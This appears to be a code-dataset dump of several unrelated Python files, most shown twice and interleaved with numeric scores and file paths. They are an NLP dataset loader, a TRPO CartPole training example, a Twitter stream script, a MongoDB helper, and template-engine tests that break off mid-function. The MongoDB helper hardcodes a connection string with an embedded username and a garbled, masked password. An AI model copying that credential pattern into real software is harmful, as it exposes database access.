return "text_a={}\ttext_b={},label={}".format(self.text_a, self.text_b, self.label)
class BaseNLPDataset(object):
"""
The virtual base class for nlp datasets, such TextClassificationDataset, SeqLabelingDataset, and so on.
The base class must be supered and re-implemented the method _read_file.
"""
def __init__(self,
base_path: str,
tokenizer: Union[BertTokenizer, CustomTokenizer],
max_seq_len: Optional[int] = 128,
mode: Optional[str] = "train",
data_file: Optional[str] = None,
label_file: Optional[str] = None,
label_list: Optional[List[str]] = None):
"""
Ags:
base_path (:obj:`str`): The directory to the whole dataset.
tokenizer (:obj:`BertTokenizer` or :obj:`CustomTokenizer`):
It tokenizes the text and encodes the data as model needed.
max_seq_len (:obj:`int`, `optional`, defaults to :128):
If set to a number, will limit the total sequence returned so that it has a maximum length.
mode (:obj:`str`, `optional`, defaults to `train`):
It identifies the dataset mode (train, test or dev).
data_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The data file name, which is relative to the base_path.
label_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The label file name, which is relative to the base_path.
It is all labels of the dataset, one line one label.
label_list(:obj:`List[str]`, `optional`, defaults to :obj:`None`):
The list of all labels of the dataset
"""
self.data_file = os.path.join(base_path, data_file)
self.label_list = label_list
self.mode = mode
self.tokenizer = tokenizer
self.max_seq_len = max_seq_len
if label_file:
self.label_file = os.path.join(base_path, label_file)
if not self.label_list:
self.label_list = self._load_label_data()
else:
logger.warning("As label_list has been assigned, label_file is noneffective")
if self.label_list:
self.label_map = {item: index for index, item in enumerate(self.label_list)}
def _load_label_data(self):
"""
Loads labels from label file.
"""
if os.path.exists(self.label_file):
with open(self.label_file, "r", encoding="utf8") as f:
return f.read().strip().split("\n")
else:
raise RuntimeError("The file {} is not found.".format(self.label_file))
def _download_and_uncompress_dataset(self, destination: str, url: str):
"""
Downloads dataset and uncompresses it.
Args:
destination (:obj:`str`): The dataset cached directory.
url (:obj: str): The link to be downloaded a dataset.
"""
if not os.path.exists(destination):
dataset_package = download(url=url, path=DATA_HOME)
if is_xarfile(dataset_package):
unarchive(dataset_package, DATA_HOME)
else:
logger.info("Dataset {} already cached.".format(destination))
def _read_file(self, input_file: str, is_file_with_header: bool = False):
"""
Reads the files.
Args:
input_file (:obj:str) : The file to be read.
is_file_with_header(:obj:bool, `optional`, default to :obj: False) :
Whether or not the file is with the header introduction.
"""
raise NotImplementedError
def get_labels(self):
"""
Gets all labels.
"""
return self.label_list
class TextClassificationDataset(BaseNLPDataset, paddle.io.Dataset):
"""
The dataset class which is fit for all datatset of text classification.
"""
def __init__(self,
base_path: str,
tokenizer: Union[BertTokenizer, CustomTokenizer],
max_seq_len: int = 128,
mode: str = "train",
data_file: str = None,
label_file: str = None,
label_list: list = None,
is_file_with_header: bool = False):
"""
Ags:
base_path (:obj:`str`): The directory to the whole dataset.
tokenizer (:obj:`BertTokenizer` or :obj:`CustomTokenizer`):
It tokenizes the text and encodes the data as model needed.
max_seq_len (:obj:`int`, `optional`, defaults to :128):
If set to a number, will limit the total sequence returned so that it has a maximum length.
mode (:obj:`str`, `optional`, defaults to `train`):
It identifies the dataset mode (train, test or dev).
data_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The data file name, which is relative to the base_path.
label_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The label file name, which is relative to the base_path.
It is all labels of the dataset, one line one label.
label_list(:obj:`List[str]`, `optional`, defaults to :obj:`None`):
The list of all labels of the dataset
is_file_with_header(:obj:bool, `optional`, default to :obj: False) :
Whether or not the file is with the header introduction.
"""
super(TextClassificationDataset, self).__init__(
base_path=base_path,
tokenizer=tokenizer,
max_seq_len=max_seq_len,
mode=mode,
data_file=data_file,
label_file=label_file,
label_list=label_list)
self.examples = self._read_file(self.data_file, is_file_with_header)
self.records = self._convert_examples_to_records(self.examples)
def _read_file(self, input_file, is_file_with_header: bool = False) -> List[InputExample]:
"""
Reads a tab separated value file.
Args:
input_file (:obj:str) : The file to be read.
is_file_with_header(:obj:bool, `optional`, default to :obj: False) :
Whether or not the file is with the header introduction.
Returns:
examples (:obj:`List[InputExample]`): All the input data.
"""
if not os.path.exists(input_file):
raise RuntimeError("The file {} is not found.".format(input_file))
else:
with io.open(input_file, "r", encoding="UTF-8") as f:
reader = csv.reader(f, delimiter="\t", quotechar=None)
examples = []
seq_id = 0
header = next(reader) if is_file_with_header else None
for line in reader:
example = InputExample(guid=seq_id, label=line[0], text_a=line[1])
seq_id += 1
examples.append(example)
return examples
def _convert_examples_to_records(self, examples: List[InputExample]) -> List[dict]:
"""
Converts all examples to records which the model needs.
Args:
examples(obj:`List[InputExample]`): All data examples returned by _read_file.
Returns:
records(:obj:`List[dict]`): All records which the model needs.
"""
records = []
for example in examples:
record = self.tokenizer.encode(text=example.text_a, text_pair=example.text_b, max_seq_len=self.max_seq_len)
# CustomTokenizer will tokenize the text firstly and then lookup words in the vocab
# When all words are not found in the vocab, the text will be dropped.
if not record:
logger.info(
"The text %s has been dropped as it has no words in the vocab after tokenization." % example.text_a)
continue
if example.label:
record['label'] = self.label_map[example.label]
records.append(record)
return records
def __getitem__(self, idx):
record = self.records[idx]
if 'label' in record.keys():
return np.array(record['input_ids']), np.array(record['segment_ids']), np.array(record['label'], dtype=np.int64)
else:
return np.array(record['input_ids']), np.array(record['segment_ids'])
def __len__(self):
return len(self.records)
class SeqLabelingDataset(BaseNLPDataset, paddle.io.Dataset):
def __init__(self,
base_path: str,
tokenizer: Union[BertTokenizer, CustomTokenizer],
max_seq_len: int = 128,
mode: str = "train",
data_file: str = None,
label_file: str = None,
label_list: list = None,
split_char: str ="\002",
no_entity_label: str = "O",
ignore_label: int = -100,
is_file_with_header: bool = False):
super(SeqLabelingDataset, self).__init__(
base_path=base_path,
tokenizer=tokenizer,
max_seq_len=max_seq_len,
mode=mode,
data_file=data_file,
label_file=label_file,
label_list=label_list)
self.no_entity_label = no_entity_label
self.split_char = split_char
self.ignore_label = ignore_label
self.examples = self._read_file(self.data_file, is_file_with_header)
self.records = self._convert_examples_to_records(self.examples)
def _read_file(self, input_file, is_file_with_header: bool = False) -> List[InputExample]:
"""Reads a tab separated value file."""
if not os.path.exists(input_file):
raise RuntimeError("The file {} is not found.".format(input_file))
else:
with io.open(input_file, "r", encoding="UTF-8") as f:
reader = csv.reader(f, delimiter="\t", quotechar=None)
examples = []
seq_id = 0
header = next(reader) if is_file_with_header else None
for line in reader:
example = InputExample(guid=seq_id, label=line[1], text_a=line[0])
seq_id += 1
examples.append(example)
return examples
def _convert_examples_to_records(self, examples: List[InputExample]) -> List[dict]:
"""
Returns a list[dict] including all the input information what the model need.
Args:
examples (list): the data examples, returned by _read_file.
Returns:
a list with all the examples record.
"""
records = []
for example in examples:
tokens, labels = self._reseg_token_label(
tokens=example.text_a.split(self.split_char),
labels=example.label.split(self.split_char))
record = self.tokenizer.encode(
text=tokens, max_seq_len=self.max_seq_len)
# CustomTokenizer will tokenize the text firstly and then lookup words in the vocab
# When all words are not found in the vocab, the text will be dropped.
if not record:
logger.info(
"The text %s has been dropped as it has no words in the vocab after tokenization."
% example.text_a)
continue
if labels:
record["label"] = []
tokens_with_specical_token = self.tokenizer.convert_ids_to_tokens(record['input_ids'])
tokens_index = 0
for token in tokens_with_specical_token:
if tokens_index < len(
tokens) and token == tokens[tokens_index]:
record["label"].append(
self.label_list.index(labels[tokens_index]))
tokens_index += 1
elif token in [self.tokenizer.pad_token]:
record["label"].append(self.ignore_label) # label of special token
else:
record["label"].append(
self.label_list.index(self.no_entity_label))
records.append(record)
return records
def _reseg_token_label(
self, tokens: List[str], labels: List[str] = None) -> Tuple[List[str], List[str]] or List[str]:
if labels:
if len(tokens) != len(labels):
raise ValueError(
"The length of tokens must be same with labels")
ret_tokens = []
ret_labels = []
for token, label in zip(tokens, labels):
sub_token = self.tokenizer(token)
if len(sub_token) == 0:
continue
ret_tokens.extend(sub_token)
ret_labels.append(label)
if len(sub_token) < 2:
continue
sub_label = label
if label.startswith("B-"):
sub_label = "I-" + label[2:]
ret_labels.extend([sub_label] * (len(sub_token) - 1))
if len(ret_tokens) != len(ret_labels):
raise ValueError(
"The length of ret_tokens can't match with labels")
return ret_tokens, ret_labels
else:
ret_tokens = []
for token in tokens:
sub_token = self.tokenizer(token)
if len(sub_token) == 0:
continue
ret_tokens.extend(sub_token)
if len(sub_token) < 2:
continue
return ret_tokens, None
def __getitem__(self, idx):
record = self.records[idx]
if 'label' in record.keys():
return np.array(record['input_ids']), np.array(record['segment_ids']), np.array(record['seq_len']), np.array(record['label'], dtype=np.int64)
else:
return np.array(record['input_ids']), np.array(record['segment_ids']), np.array(record['seq_len'])
def __len__(self):
return len(self.records)
| 0.895651 | 0.258782 |
"""This is an example to train a task with parallel sampling."""
import click
from garage import wrap_experiment
from garage.envs import GarageEnv
from garage.experiment import LocalTFRunner
from garage.experiment.deterministic import set_seed
from garage.np.baselines import LinearFeatureBaseline
from garage.tf.algos import TRPO
from garage.tf.policies import CategoricalMLPPolicy
from garage.tf.samplers import BatchSampler
@click.command()
@click.option('--batch_size', type=int, default=4000)
@click.option('--max_path_length', type=int, default=100)
@wrap_experiment
def trpo_cartpole_batch_sampler(ctxt=None,
seed=1,
batch_size=4000,
max_path_length=100):
"""Train TRPO with CartPole-v1 environment.
Args:
ctxt (garage.experiment.ExperimentContext): The experiment
configuration used by LocalRunner to create the snapshotter.
seed (int): Used to seed the random number generator to produce
determinism.
batch_size (int): Number of timesteps to use in each training step.
max_path_length (int): Number of timesteps to truncate paths to.
"""
set_seed(seed)
n_envs = batch_size // max_path_length
with LocalTFRunner(ctxt, max_cpus=n_envs) as runner:
env = GarageEnv(env_name='CartPole-v1')
policy = CategoricalMLPPolicy(name='policy',
env_spec=env.spec,
hidden_sizes=(32, 32))
baseline = LinearFeatureBaseline(env_spec=env.spec)
algo = TRPO(env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=max_path_length,
discount=0.99,
max_kl_step=0.01)
runner.setup(algo=algo,
env=env,
sampler_cls=BatchSampler,
sampler_args={'n_envs': n_envs})
runner.train(n_epochs=100, batch_size=4000, plot=False)
trpo_cartpole_batch_sampler()
|
examples/tf/trpo_cartpole_batch_sampler.py
|
"""This is an example to train a task with parallel sampling."""
import click
from garage import wrap_experiment
from garage.envs import GarageEnv
from garage.experiment import LocalTFRunner
from garage.experiment.deterministic import set_seed
from garage.np.baselines import LinearFeatureBaseline
from garage.tf.algos import TRPO
from garage.tf.policies import CategoricalMLPPolicy
from garage.tf.samplers import BatchSampler
@click.command()
@click.option('--batch_size', type=int, default=4000)
@click.option('--max_path_length', type=int, default=100)
@wrap_experiment
def trpo_cartpole_batch_sampler(ctxt=None,
seed=1,
batch_size=4000,
max_path_length=100):
"""Train TRPO with CartPole-v1 environment.
Args:
ctxt (garage.experiment.ExperimentContext): The experiment
configuration used by LocalRunner to create the snapshotter.
seed (int): Used to seed the random number generator to produce
determinism.
batch_size (int): Number of timesteps to use in each training step.
max_path_length (int): Number of timesteps to truncate paths to.
"""
set_seed(seed)
n_envs = batch_size // max_path_length
with LocalTFRunner(ctxt, max_cpus=n_envs) as runner:
env = GarageEnv(env_name='CartPole-v1')
policy = CategoricalMLPPolicy(name='policy',
env_spec=env.spec,
hidden_sizes=(32, 32))
baseline = LinearFeatureBaseline(env_spec=env.spec)
algo = TRPO(env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=max_path_length,
discount=0.99,
max_kl_step=0.01)
runner.setup(algo=algo,
env=env,
sampler_cls=BatchSampler,
sampler_args={'n_envs': n_envs})
runner.train(n_epochs=100, batch_size=4000, plot=False)
trpo_cartpole_batch_sampler()
| 0.909846 | 0.424651 |
import json
import requests
import json
import os
from dotenv import load_dotenv
# Load env
load_dotenv()
bearer_token = os.getenv("BEARER_TOKEN")
##chatid = os.getenv("CHATID")
def bearer_oauth(r):
r.headers["Authorization"] = f"Bearer {bearer_token}"
r.headers["User-Agent"] = "v2FilteredStreamPython"
return r
def get_rules():
response = requests.get(
"https://api.twitter.com/2/tweets/search/stream/rules", auth=bearer_oauth
)
if response.status_code != 200:
raise Exception(
"Cannot get rules (HTTP {}): {}".format(response.status_code, response.text)
)
print(json.dumps(response.json()))
return response.json()
def delete_all_rules(rules):
if rules is None or "data" not in rules:
return None
ids = list(map(lambda rule: rule["id"], rules["data"]))
payload = {"delete": {"ids": ids}}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth=bearer_oauth,
json=payload
)
if response.status_code != 200:
raise Exception(
"Cannot delete rules (HTTP {}): {}".format(
response.status_code, response.text
)
)
print(json.dumps(response.json()))
def set_rules(delete):
sample_rules = [
{"value" : "from:y_o_m_y_o_m"},
]
payload = {"add": sample_rules}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth = bearer_oauth,
json = payload,
)
if response.status_code != 201:
raise Exception(
"Cannot add rules : {} {}".format(response.status_code, response.text)
)
print(json.dumps(response.json()))
def get_stream(set):
tweet_fields = "tweet.fields=public_metrics,entities"
url = "https://api.twitter.com/2/tweets/search/stream?{}&expansions=author_id".format(tweet_fields)
response = requests.get(
url,auth=bearer_oauth, stream=True,
)
#print(response.status_code)
if response.status_code != 200:
raise Exception(
"Cannot add stream, : {} {}".format(response.status_code, response.text)
)
for response_line in response.iter_lines():
if response_line:
json_response = json.loads(response_line)
# print(json.dumps(json_response, indent=4, sort_keys=True))
if "RT " not in json_response["data"]["text"]:
print(json_response["data"]["text"])
fp = open("tweet", "w")
fp.write(json_response["data"]["text"])
fp.close()
os._exit(0)
def main():
rules = get_rules()
delete = delete_all_rules(rules)
set = set_rules(delete)
get_stream(set)
if __name__ == "__main__":
main()
|
doukichan.py
|
import json
import requests
import json
import os
from dotenv import load_dotenv
# Load env
load_dotenv()
bearer_token = os.getenv("BEARER_TOKEN")
##chatid = os.getenv("CHATID")
def bearer_oauth(r):
r.headers["Authorization"] = f"Bearer {bearer_token}"
r.headers["User-Agent"] = "v2FilteredStreamPython"
return r
def get_rules():
response = requests.get(
"https://api.twitter.com/2/tweets/search/stream/rules", auth=bearer_oauth
)
if response.status_code != 200:
raise Exception(
"Cannot get rules (HTTP {}): {}".format(response.status_code, response.text)
)
print(json.dumps(response.json()))
return response.json()
def delete_all_rules(rules):
if rules is None or "data" not in rules:
return None
ids = list(map(lambda rule: rule["id"], rules["data"]))
payload = {"delete": {"ids": ids}}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth=bearer_oauth,
json=payload
)
if response.status_code != 200:
raise Exception(
"Cannot delete rules (HTTP {}): {}".format(
response.status_code, response.text
)
)
print(json.dumps(response.json()))
def set_rules(delete):
sample_rules = [
{"value" : "from:y_o_m_y_o_m"},
]
payload = {"add": sample_rules}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth = bearer_oauth,
json = payload,
)
if response.status_code != 201:
raise Exception(
"Cannot add rules : {} {}".format(response.status_code, response.text)
)
print(json.dumps(response.json()))
def get_stream(set):
tweet_fields = "tweet.fields=public_metrics,entities"
url = "https://api.twitter.com/2/tweets/search/stream?{}&expansions=author_id".format(tweet_fields)
response = requests.get(
url,auth=bearer_oauth, stream=True,
)
#print(response.status_code)
if response.status_code != 200:
raise Exception(
"Cannot add stream, : {} {}".format(response.status_code, response.text)
)
for response_line in response.iter_lines():
if response_line:
json_response = json.loads(response_line)
# print(json.dumps(json_response, indent=4, sort_keys=True))
if "RT " not in json_response["data"]["text"]:
print(json_response["data"]["text"])
fp = open("tweet", "w")
fp.write(json_response["data"]["text"])
fp.close()
os._exit(0)
def main():
rules = get_rules()
delete = delete_all_rules(rules)
set = set_rules(delete)
get_stream(set)
if __name__ == "__main__":
main()
| 0.150715 | 0.078926 |
import requests
import pymongo
class DataBase:
def __init__(self):
self.client = None
self.db = None
self.col = None
self.connect_init()
def connect_init(self):
# 下面这个是哪个数据库来着???
# self.client = pymongo.MongoClient("mongodb+srv://LanceLiang:<EMAIL>."
# "mongodb.net/test?retryWrites=true&w=majority")
self.client = pymongo.MongoClient("mongodb+srv://lanceliang:1<EMAIL>0<EMAIL>."
"mongodb.net/test?retryWrites=true&w=majority")
# self.client = pymongo.MongoClient()
self.db = self.client.novel_publisher
self.col = self.db.novel_publisher
def db_init(self):
collection_names = self.db.list_collection_names()
if 'novel_publisher' in collection_names:
self.db.drop_collection('novel_publisher')
if 'novel_publisher' in collection_names:
self.db.drop_collection('novel_publisher')
self.col = self.db.novel_publisher
# 只有在插入一个数据之后才会建立Collection
# print(dict(self.col.find({})))
# self.col.insert_one({'created': True})
def get_books(self):
data = list(self.col.distinct('bookname'))
return data
def get_chapters(self, bookname=None):
if bookname is None:
data = list(self.col.distinct('chaptername'))
else:
data = list(self.col.find({'bookname': bookname}, {'bookname': 1, 'chaptername': 1, '_id': 0}))
return data
def publish(self, bookname: str, chaptername: str, url: str):
data = list(self.col.find({'bookname': bookname, 'chaptername': chaptername}, {}))
if len(data) == 0:
self.col.insert_one({'bookname': bookname, 'chaptername': chaptername, 'url': url})
else:
self.col.update_one({'bookname': bookname, 'chaptername': chaptername},
{'$set': {'bookname': bookname, 'chaptername': chaptername, 'url': url}})
def get_content(self, bookname: str, chaptername: str):
data = list(self.col.find({'bookname': bookname, 'chaptername': chaptername},
{'bookname': 1, 'chaptername': 1, 'url': 1, '_id': 0}))
if len(data) == 0:
return None
return data[0]['url']
if __name__ == '__main__':
_db = DataBase()
_db.db_init()
_db.publish('TestBook', 'TestChapter', 'https://raw.githubusercontent.com/LanceLiang2018/MyNovels/master/novels/%E7%9F%AD%E7%AF%87/%E6%97%A7%E6%A2%A6/%E6%97%A7%E6%A2%A6.md')
print(_db.get_books())
print(_db.get_chapters('TestBook'))
print(_db.get_content('TestBook', 'TestChapter'))
|
database.py
|
import requests
import pymongo
class DataBase:
def __init__(self):
self.client = None
self.db = None
self.col = None
self.connect_init()
def connect_init(self):
# 下面这个是哪个数据库来着???
# self.client = pymongo.MongoClient("mongodb+srv://LanceLiang:<EMAIL>."
# "mongodb.net/test?retryWrites=true&w=majority")
self.client = pymongo.MongoClient("mongodb+srv://lanceliang:1<EMAIL>0<EMAIL>."
"mongodb.net/test?retryWrites=true&w=majority")
# self.client = pymongo.MongoClient()
self.db = self.client.novel_publisher
self.col = self.db.novel_publisher
def db_init(self):
collection_names = self.db.list_collection_names()
if 'novel_publisher' in collection_names:
self.db.drop_collection('novel_publisher')
if 'novel_publisher' in collection_names:
self.db.drop_collection('novel_publisher')
self.col = self.db.novel_publisher
# 只有在插入一个数据之后才会建立Collection
# print(dict(self.col.find({})))
# self.col.insert_one({'created': True})
def get_books(self):
data = list(self.col.distinct('bookname'))
return data
def get_chapters(self, bookname=None):
if bookname is None:
data = list(self.col.distinct('chaptername'))
else:
data = list(self.col.find({'bookname': bookname}, {'bookname': 1, 'chaptername': 1, '_id': 0}))
return data
def publish(self, bookname: str, chaptername: str, url: str):
data = list(self.col.find({'bookname': bookname, 'chaptername': chaptername}, {}))
if len(data) == 0:
self.col.insert_one({'bookname': bookname, 'chaptername': chaptername, 'url': url})
else:
self.col.update_one({'bookname': bookname, 'chaptername': chaptername},
{'$set': {'bookname': bookname, 'chaptername': chaptername, 'url': url}})
def get_content(self, bookname: str, chaptername: str):
data = list(self.col.find({'bookname': bookname, 'chaptername': chaptername},
{'bookname': 1, 'chaptername': 1, 'url': 1, '_id': 0}))
if len(data) == 0:
return None
return data[0]['url']
if __name__ == '__main__':
_db = DataBase()
_db.db_init()
_db.publish('TestBook', 'TestChapter', 'https://raw.githubusercontent.com/LanceLiang2018/MyNovels/master/novels/%E7%9F%AD%E7%AF%87/%E6%97%A7%E6%A2%A6/%E6%97%A7%E6%A2%A6.md')
print(_db.get_books())
print(_db.get_chapters('TestBook'))
print(_db.get_content('TestBook', 'TestChapter'))
| 0.110435 | 0.108969 |
import re
import pytest
from errors import TemplateSyntaxError
from template import Template
def tryRender(text, ctx=None, expected=None):
actual = Template(text).render(ctx or {})
if expected:
assert actual == expected
def assertSyntaxError(text, ctx=None, msg=None):
with pytest.raises(TemplateSyntaxError) as excinfo:
tryRender(text, ctx)
assert str(excinfo.value) == msg
def test_passthrough():
tryRender("Hello.", {}, "Hello.")
tryRender("Hello, 20% fun time!", {}, "Hello, 20% fun time!")
def test_variables():
tryRender("Hello, {{name}}!", {'name': '1_x7'}, "Hello, 1_x7!")
def test_undefined_variables():
with pytest.raises(KeyError):
tryRender("Hi, {{name}}!")
def test_pipes():
data = {
'name': 'Ned',
'upper': lambda x: x.upper(),
'second': lambda x: x[1],
}
tryRender("Hello, {{name|upper}}!", data, "Hello, NED!")
tryRender("Hello, {{name|upper|second}}!", data, "Hello, E!")
def test_reusability():
globs = {
'upper': lambda x: x.upper(),
'punct': '!',
}
template = Template("This is {{name|upper}}{{punct}}", globs)
assert template.render({'name': 'Ned'}) == "This is NED!"
assert template.render({'name': 'Ben'}) == "This is BEN!"
def test_attributes():
obj = AnyOldObject(a="Ay")
tryRender("{{obj.a}}", locals(), "Ay")
obj2 = AnyOldObject(obj=obj, b="Bee")
tryRender("{{obj2.obj.a}} {{obj2.b}}", locals(), "Ay Bee")
def test_member_function():
class WithMemberFns(AnyOldObject):
def ditto(self):
return self.txt + self.txt
obj = WithMemberFns(txt="Once")
tryRender("{{obj.ditto}}", locals(), "OnceOnce")
def test_dict():
d = {'a': 17, 'b': 23}
tryRender("{{d.a}} < {{d.b}}", locals(), "17 < 23")
def test_loops():
nums = [1, 2, 3, 4]
tryRender(
"Look: {% for n in nums %}{{n}}, {% endfor %}done.",
locals(),
"Look: 1, 2, 3, 4, done."
)
def test_loops_with_pipes():
nums = [1, 2, 3, 4]
def rev(l):
l = l[:]
l.reverse()
return l
tryRender(
"Look: {% for n in nums|rev %}{{n}}, {% endfor %}done.",
locals(),
"Look: 4, 3, 2, 1, done."
)
def test_empty_loops():
tryRender(
"Empty: {% for n in nums %}{{n}}, {% endfor %}done.",
{'nums': []},
"Empty: done."
)
def test_multiline_loops():
tryRender(
"Look: \n{% for n in nums %}\n{{n}}, \n{% endfor %}done.",
{'nums': [1, 2, 3]},
"Look: \n\n1, \n\n2, \n\n3, \ndone."
)
def test_multiple_loops():
tryRender(
"{% for n in nums %}{{n}}{% endfor %} and "
"{% for n in nums %}{{n}}{% endfor %}",
{'nums': [1, 2, 3]},
"123 and 123"
)
def test_comments():
tryRender(
"Hello, {# Name goes here: #}{{name}}!",
{'name': 'Ned'}, "Hello, Ned!"
)
tryRender(
"Hello, {# Name\ngoes\nhere: #}{{name}}!",
{'name': 'Ned'}, "Hello, Ned!"
)
def test_if():
tryRender(
"Hi, {% if ned %}NED{% endif %}{% if ben %}BEN{% endif %}!",
{'ned': 1, 'ben': 0},
"Hi, NED!"
)
tryRender(
"Hi, {% if ned %}NED{% endif %}{% if ben %}BEN{% endif %}!",
{'ned': 0, 'ben': 1},
"Hi, BEN!"
)
tryRender(
"Hi, {% if ned %}NED{% if ben %}BEN{% endif %}{% endif %}!",
{'ned': 0, 'ben': 0},
"Hi, !"
)
tryRender(
"Hi, {% if ned %}NED{% if ben %}BEN{% endif %}{% endif %}!",
{'ned': 1, 'ben': 0},
"Hi, NED!"
)
tryRender(
"Hi, {% if ned %}NED{% if ben %}BEN{% endif %}{% endif %}!",
{'ned': 1, 'ben': 1},
"Hi, NEDBEN!"
)
def test_complex_if():
class Complex(AnyOldObject):
"""A class to try out complex data access."""
def getit(self):
"""Return it."""
return self.it
obj = Complex(it={'x': "Hello", 'y': 0})
tryRender(
"@"
"{% if obj.getit.x %}X{% endif %}"
"{% if obj.getit.y %}Y{% endif %}"
"{% if obj.getit.y|str %}S{% endif %}"
"!",
{'obj': obj, 'str': str},
"@XS!"
)
def test_loop_if():
tryRender(
"@{% for n in nums %}{% if n %}Z{% endif %}{{n}}{% endfor %}!",
{'nums': [0, 1, 2]},
"@0Z1Z2!"
)
tryRender(
"X{%if nums%}@{% for n in nums %}{{n}}{% endfor %}{%endif%}!",
{'nums': [0, 1, 2]},
"X@012!"
)
tryRender(
"X{%if nums%}@{% for n in nums %}{{n}}{% endfor %}{%endif%}!",
{'nums': []},
"X!"
)
def test_nested_loops():
tryRender(
"@"
"{% for n in nums %}"
"{% for a in abc %}{{a}}{{n}}{% endfor %}"
"{% endfor %}"
"!",
{'nums': [0, 1, 2], 'abc': ['a', 'b', 'c']},
"@a0b0c0a1b1c1a2b2c2!"
)
def test_exception_during_evaluation():
with pytest.raises(TypeError):
tryRender("Hey {{foo.bar.baz}} there", {'foo': None}, "Hey ??? there")
def test_bad_names():
assertSyntaxError("Wat: {{ var%&!@ }}", {}, "The param's name is invalid.: 'var%&!@'")
assertSyntaxError("Wat: {{ foo|filter%&!@ }}", {}, "The param's name is invalid.: 'filter%&!@'")
assertSyntaxError("Wat: {% for @ in x %}{% endfor %}", {}, "The param's name is invalid.: '@'")
def test_bogus_tag_syntax():
assertSyntaxError("Huh: {% bogus %}!!{% endbogus %}??", {}, "Don't understand tag: 'bogus'")
def test_malformed_if():
assertSyntaxError("Buh? {% if %}hi!{% endif %}", {}, "Invalid If Statement: '{% if %}'")
assertSyntaxError("Buh? {% if this or that %}hi!{% endif %}", {}, "Invalid If Statement: '{% if this or that %}'")
def test_malformed_for():
assertSyntaxError("Weird: {% for %}loop{% endfor %}", {}, "Invalid For Statement: '{% for %}'")
assertSyntaxError("Weird: {% for x from y %}loop{% endfor %}", {}, "Invalid For Statement: '{% for x from y %}'")
assertSyntaxError("Weird: {% for x, y in z %}loop{% endfor %}", {}, "Invalid For Statement: '{% for x, y in z %}'")
def test_bad_nesting():
assertSyntaxError("{% if x %}X", {}, "Unmatched action tag: 'if'")
assertSyntaxError("{% if x %}X{% endfor %}", {}, "Mismatched end tag: 'for'")
assertSyntaxError("{% if x %}{% endif %}{% endif %}", {}, "Too many ends: '{% endif %}'")
def test_malformed_end():
assertSyntaxError("{% if x %}X{% end if %}", {}, "Invalid End Statement: '{% end if %}'")
assertSyntaxError("{% if x %}X{% endif now %}", {}, "Invalid End Statement: '{% endif now %}'")
class AnyOldObject:
def __init__(self, **attrs):
for k, v in attrs.items():
setattr(self, k, v)
|
template_test.py
|
import re
import pytest
from errors import TemplateSyntaxError
from template import Template
def tryRender(text, ctx=None, expected=None):
actual = Template(text).render(ctx or {})
if expected:
assert actual == expected
def assertSyntaxError(text, ctx=None, msg=None):
with pytest.raises(TemplateSyntaxError) as excinfo:
tryRender(text, ctx)
assert str(excinfo.value) == msg
def test_passthrough():
tryRender("Hello.", {}, "Hello.")
tryRender("Hello, 20% fun time!", {}, "Hello, 20% fun time!")
def test_variables():
tryRender("Hello, {{name}}!", {'name': '1_x7'}, "Hello, 1_x7!")
def test_undefined_variables():
with pytest.raises(KeyError):
tryRender("Hi, {{name}}!")
def test_pipes():
data = {
'name': 'Ned',
'upper': lambda x: x.upper(),
'second': lambda x: x[1],
}
tryRender("Hello, {{name|upper}}!", data, "Hello, NED!")
tryRender("Hello, {{name|upper|second}}!", data, "Hello, E!")
def test_reusability():
globs = {
'upper': lambda x: x.upper(),
'punct': '!',
}
template = Template("This is {{name|upper}}{{punct}}", globs)
assert template.render({'name': 'Ned'}) == "This is NED!"
assert template.render({'name': 'Ben'}) == "This is BEN!"
def test_attributes():
obj = AnyOldObject(a="Ay")
tryRender("{{obj.a}}", locals(), "Ay")
obj2 = AnyOldObject(obj=obj, b="Bee")
tryRender("{{obj2.obj.a}} {{obj2.b}}", locals(), "Ay Bee")
def test_member_function():
class WithMemberFns(AnyOldObject):
def ditto(self):
return self.txt + self.txt
obj = WithMemberFns(txt="Once")
tryRender("{{obj.ditto}}", locals(), "OnceOnce")
def test_dict():
d = {'a': 17, 'b': 23}
tryRender("{{d.a}} < {{d.b}}", locals(), "17 < 23")
def test_loops():
nums = [1, 2, 3, 4]
tryRender(
"Look: {% for n in nums %}{{n}}, {% endfor %}done.",
locals(),
"Look: 1, 2, 3, 4, done."
)
def test_loops_with_pipes():
nums = [1, 2, 3, 4]
def rev(l):
l = l[:]
l.reverse()
return l
tryRender(
"Look: {% for n in nums|rev %}{{n}}, {% endfor %}done.",
locals(),
"Look: 4, 3, 2, 1, done."
)
def test_empty_loops():
tryRender(
"Empty: {% for n in nums %}{{n}}, {% endfor %}done.",
{'nums': []},
"Empty: done."
)
def test_multiline_loops():
tryRender(
"Look: \n{% for n in nums %}\n{{n}}, \n{% endfor %}done.",
{'nums': [1, 2, 3]},
"Look: \n\n1, \n\n2, \n\n3, \ndone."
)
def test_multiple_loops():
tryRender(
"{% for n in nums %}{{n}}{% endfor %} and "
"{% for n in nums %}{{n}}{% endfor %}",
{'nums': [1, 2, 3]},
"123 and 123"
)
def test_comments():
tryRender(
"Hello, {# Name goes here: #}{{name}}!",
{'name': 'Ned'}, "Hello, Ned!"
)
tryRender(
"Hello, {# Name\ngoes\nhere: #}{{name}}!",
{'name': 'Ned'}, "Hello, Ned!"
)
def test_if():
tryRender(
"Hi, {% if ned %}NED{% endif %}{% if ben %}BEN{% endif %}!",
{'ned': 1, 'ben': 0},
"Hi, NED!"
)
tryRender(
"Hi, {% if ned %}NED{% endif %}{% if ben %}BEN{% endif %}!",
{'ned': 0, 'ben': 1},
"Hi, BEN!"
)
tryRender(
"Hi, {% if ned %}NED{% if ben %}BEN{% endif %}{% endif %}!",
{'ned': 0, 'ben': 0},
"Hi, !"
)
tryRender(
"Hi, {% if ned %}NED{% if ben %}BEN{% endif %}{% endif %}!",
{'ned': 1, 'ben': 0},
"Hi, NED!"
)
tryRender(
"Hi, {% if ned %}NED{% if ben %}BEN{% endif %}{% endif %}!",
{'ned': 1, 'ben': 1},
"Hi, NEDBEN!"
)
def test_complex_if():
class Complex(AnyOldObject):
"""A class to try out complex data access."""
